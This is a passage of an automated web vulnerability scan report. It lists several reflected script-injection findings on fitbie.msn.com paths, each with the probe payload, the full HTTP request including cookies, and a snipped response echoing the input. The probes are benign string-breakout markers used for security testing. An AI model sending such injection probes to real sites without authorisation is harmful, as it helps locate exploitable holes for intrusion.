GET /get-fit/reveal-your-abs-goodfabaa'%3bcb57fb69a4d HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:35:00 +0000
ETag: "1297607700-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:35:01 GMT
Date: Sun, 13 Feb 2011 14:35:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/reveal-your-abs-goodfabaa';cb57fb69a4d?destination=node%2Freveal-your-abs-goodfabaa';cb57fb69a4d&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.10. http://fitbie.msn.com/get-fit/strength-training [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/get-fit/strength-training

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bf58'%3bbb24d26f8c8 was submitted in the REST URL parameter 2. This input was echoed as 4bf58';bb24d26f8c8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /get-fit/strength-training4bf58'%3bbb24d26f8c8 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:32:38 +0000
ETag: "1297607558-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:32:38 GMT
Date: Sun, 13 Feb 2011 14:32:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/strength-training4bf58';bb24d26f8c8?destination=node%2Fstrength-training4bf58';bb24d26f8c8&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.11. http://fitbie.msn.com/get-fit/walking [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/get-fit/walking

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c4b4'%3b301467b08e9 was submitted in the REST URL parameter 2. This input was echoed as 6c4b4';301467b08e9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /get-fit/walking6c4b4'%3b301467b08e9 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:32:20 +0000
ETag: "1297607540-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:32:21 GMT
Date: Sun, 13 Feb 2011 14:32:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/walking6c4b4';301467b08e9?destination=node%2Fwalking6c4b4';301467b08e9&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.12. http://fitbie.msn.com/get-fit/women [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/get-fit/women

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ff36'%3b29b10a83ad4 was submitted in the REST URL parameter 2. This input was echoed as 2ff36';29b10a83ad4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /get-fit/women2ff36'%3b29b10a83ad4 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:34:30 +0000
ETag: "1297607670-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:34:31 GMT
Date: Sun, 13 Feb 2011 14:34:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/women2ff36';29b10a83ad4?destination=node%2Fwomen2ff36';29b10a83ad4&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.13. http://fitbie.msn.com/get-fit/yoga [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/get-fit/yoga

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf23c'%3b9ce66478957 was submitted in the REST URL parameter 2. This input was echoed as cf23c';9ce66478957 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /get-fit/yogacf23c'%3b9ce66478957 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:33:40 +0000
ETag: "1297607620-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:33:41 GMT
Date: Sun, 13 Feb 2011 14:33:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49131

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/yogacf23c';9ce66478957?destination=node%2Fyogacf23c';9ce66478957&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.14. http://fitbie.msn.com/look-and-feel-thinner/3-abs-myths-busted [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/look-and-feel-thinner/3-abs-myths-busted

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 520e5'%3be1436a39e19 was submitted in the REST URL parameter 2. This input was echoed as 520e5';e1436a39e19 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /look-and-feel-thinner/3-abs-myths-busted520e5'%3be1436a39e19 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:36:36 +0000
ETag: "1297607796-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:36:37 GMT
Date: Sun, 13 Feb 2011 14:36:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/3-abs-myths-busted520e5';e1436a39e19?destination=node%2F3-abs-myths-busted520e5';e1436a39e19&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.15. http://fitbie.msn.com/lose-weight/after [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/lose-weight/after

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4ce9'%3b144e2b0f49e was submitted in the REST URL parameter 2. This input was echoed as f4ce9';144e2b0f49e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /lose-weight/afterf4ce9'%3b144e2b0f49e HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/fat-burning-workouts
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:52 +0000
ETag: "1297607392-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:52 GMT
Date: Sun, 13 Feb 2011 14:29:52 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49157

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/afterf4ce9';144e2b0f49e?destination=node%2Fafterf4ce9';144e2b0f49e&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.16. http://fitbie.msn.com/lose-weight/fat-burning-workouts [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/lose-weight/fat-burning-workouts

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9871a'%3b0661b3de472 was submitted in the REST URL parameter 2. This input was echoed as 9871a';0661b3de472 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /lose-weight/fat-burning-workouts9871a'%3b0661b3de472 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
